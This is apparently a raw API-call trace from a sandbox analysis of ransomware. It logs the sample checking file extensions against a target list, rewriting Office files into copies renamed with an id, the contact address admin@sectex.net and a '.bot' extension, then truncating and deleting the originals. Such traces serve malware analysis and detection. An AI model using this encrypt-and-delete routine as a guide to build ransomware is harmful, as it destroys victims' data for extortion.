	[0153.060] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.061] lstrlenW (lpString=".jpg") returned 4
	[0153.061] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.061] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0153.061] lstrlenW (lpString="VISIO_PRM_COL.HXT") returned 17
	[0153.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.061] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=209) returned 1
	[0153.062] CloseHandle (hObject=0x2a0) returned 1
	[0153.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt")) returned 0x20
	[0153.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.062] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.062] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0153.063] GetLastError () returned 0x0
	[0153.063] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xd1, lpOverlapped=0x0) returned 1
	[0153.064] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0153.064] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.065] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.065] SetEndOfFile (hFile=0x384) returned 1
	[0153.065] CloseHandle (hObject=0x384) returned 1
	[0153.065] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.065] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.067] CloseHandle (hObject=0x2a0) returned 1
	[0153.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt")) returned 1
	[0153.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.068] lstrlenW (lpString=".doc") returned 4
	[0153.068] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.068] lstrlenW (lpString=".docx") returned 5
	[0153.068] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.068] lstrlenW (lpString=".pdf") returned 4
	[0153.068] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.068] lstrlenW (lpString=".xls") returned 4
	[0153.068] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.068] lstrlenW (lpString=".xlsx") returned 5
	[0153.068] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.069] lstrlenW (lpString=".ppt") returned 4
	[0153.069] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.069] lstrlenW (lpString=".zip") returned 4
	[0153.069] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.069] lstrlenW (lpString=".rar") returned 4
	[0153.069] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.069] lstrlenW (lpString=".bz2") returned 4
	[0153.069] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.069] lstrlenW (lpString=".7z") returned 3
	[0153.069] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.069] lstrlenW (lpString=".dbf") returned 4
	[0153.069] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.069] lstrlenW (lpString=".1cd") returned 4
	[0153.069] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.069] lstrlenW (lpString=".jpg") returned 4
	[0153.069] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.069] lstrlenW (lpString=".doc") returned 4
	[0153.069] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.069] lstrlenW (lpString=".docx") returned 5
	[0153.069] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.069] lstrlenW (lpString=".pdf") returned 4
	[0153.069] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.069] lstrlenW (lpString=".xls") returned 4
	[0153.070] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.070] lstrlenW (lpString=".xlsx") returned 5
	[0153.070] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.070] lstrlenW (lpString=".ppt") returned 4
	[0153.070] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.070] lstrlenW (lpString=".zip") returned 4
	[0153.070] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.070] lstrlenW (lpString=".rar") returned 4
	[0153.070] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.070] lstrlenW (lpString=".bz2") returned 4
	[0153.070] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.070] lstrlenW (lpString=".7z") returned 3
	[0153.070] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.070] lstrlenW (lpString=".dbf") returned 4
	[0153.070] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.070] lstrlenW (lpString=".1cd") returned 4
	[0153.070] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT") returned 65
	[0153.070] lstrlenW (lpString=".jpg") returned 4
	[0153.070] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.070] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.070] lstrlenW (lpString="VISIO_PRM_F_COL.HXK") returned 19
	[0153.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.071] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0153.071] CloseHandle (hObject=0x2a0) returned 1
	[0153.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk")) returned 0x20
	[0153.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.071] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.072] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0153.072] GetLastError () returned 0x0
	[0153.072] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0153.073] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.074] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.074] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.074] SetEndOfFile (hFile=0x384) returned 1
	[0153.074] CloseHandle (hObject=0x384) returned 1
	[0153.075] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.075] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.077] CloseHandle (hObject=0x2a0) returned 1
	[0153.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.077] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk")) returned 1
	[0153.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.078] lstrlenW (lpString=".doc") returned 4
	[0153.078] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.078] lstrlenW (lpString=".docx") returned 5
	[0153.078] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.078] lstrlenW (lpString=".pdf") returned 4
	[0153.078] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.078] lstrlenW (lpString=".xls") returned 4
	[0153.078] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.078] lstrlenW (lpString=".xlsx") returned 5
	[0153.078] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.078] lstrlenW (lpString=".ppt") returned 4
	[0153.078] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.078] lstrlenW (lpString=".zip") returned 4
	[0153.078] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.078] lstrlenW (lpString=".rar") returned 4
	[0153.078] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.078] lstrlenW (lpString=".bz2") returned 4
	[0153.078] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.078] lstrlenW (lpString=".7z") returned 3
	[0153.078] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.079] lstrlenW (lpString=".dbf") returned 4
	[0153.079] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.079] lstrlenW (lpString=".1cd") returned 4
	[0153.079] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.079] lstrlenW (lpString=".jpg") returned 4
	[0153.079] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.079] lstrlenW (lpString=".doc") returned 4
	[0153.079] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.079] lstrlenW (lpString=".docx") returned 5
	[0153.079] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.079] lstrlenW (lpString=".pdf") returned 4
	[0153.079] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.079] lstrlenW (lpString=".xls") returned 4
	[0153.079] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.079] lstrlenW (lpString=".xlsx") returned 5
	[0153.079] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.079] lstrlenW (lpString=".ppt") returned 4
	[0153.079] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.079] lstrlenW (lpString=".zip") returned 4
	[0153.079] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.079] lstrlenW (lpString=".rar") returned 4
	[0153.079] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.079] lstrlenW (lpString=".bz2") returned 4
	[0153.079] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.079] lstrlenW (lpString=".7z") returned 3
	[0153.080] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.080] lstrlenW (lpString=".dbf") returned 4
	[0153.080] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.080] lstrlenW (lpString=".1cd") returned 4
	[0153.080] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK") returned 67
	[0153.080] lstrlenW (lpString=".jpg") returned 4
	[0153.080] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.080] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.080] lstrlenW (lpString="VISIO_PRM_K_COL.HXK") returned 19
	[0153.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.081] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0153.081] CloseHandle (hObject=0x2a0) returned 1
	[0153.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk")) returned 0x20
	[0153.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.081] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.081] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0153.082] GetLastError () returned 0x0
	[0153.082] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0153.085] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.086] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.086] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.086] SetEndOfFile (hFile=0x384) returned 1
	[0153.086] CloseHandle (hObject=0x384) returned 1
	[0153.086] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.086] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.089] CloseHandle (hObject=0x2a0) returned 1
	[0153.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk")) returned 1
	[0153.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.236] lstrlenW (lpString=".doc") returned 4
	[0153.236] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.236] lstrlenW (lpString=".docx") returned 5
	[0153.236] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.236] lstrlenW (lpString=".pdf") returned 4
	[0153.236] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.236] lstrlenW (lpString=".xls") returned 4
	[0153.236] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.236] lstrlenW (lpString=".xlsx") returned 5
	[0153.236] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.236] lstrlenW (lpString=".ppt") returned 4
	[0153.236] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.236] lstrlenW (lpString=".zip") returned 4
	[0153.236] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.236] lstrlenW (lpString=".rar") returned 4
	[0153.236] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.236] lstrlenW (lpString=".bz2") returned 4
	[0153.236] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.236] lstrlenW (lpString=".7z") returned 3
	[0153.236] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.236] lstrlenW (lpString=".dbf") returned 4
	[0153.236] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.236] lstrlenW (lpString=".1cd") returned 4
	[0153.237] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.237] lstrlenW (lpString=".jpg") returned 4
	[0153.237] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.237] lstrlenW (lpString=".doc") returned 4
	[0153.237] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.237] lstrlenW (lpString=".docx") returned 5
	[0153.237] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.237] lstrlenW (lpString=".pdf") returned 4
	[0153.237] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.237] lstrlenW (lpString=".xls") returned 4
	[0153.237] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.237] lstrlenW (lpString=".xlsx") returned 5
	[0153.237] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.237] lstrlenW (lpString=".ppt") returned 4
	[0153.237] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.237] lstrlenW (lpString=".zip") returned 4
	[0153.237] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.237] lstrlenW (lpString=".rar") returned 4
	[0153.237] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.237] lstrlenW (lpString=".bz2") returned 4
	[0153.237] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.237] lstrlenW (lpString=".7z") returned 3
	[0153.237] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.237] lstrlenW (lpString=".dbf") returned 4
	[0153.237] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK") returned 67
	[0153.238] lstrlenW (lpString=".1cd") returned 4
	[0153.238] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
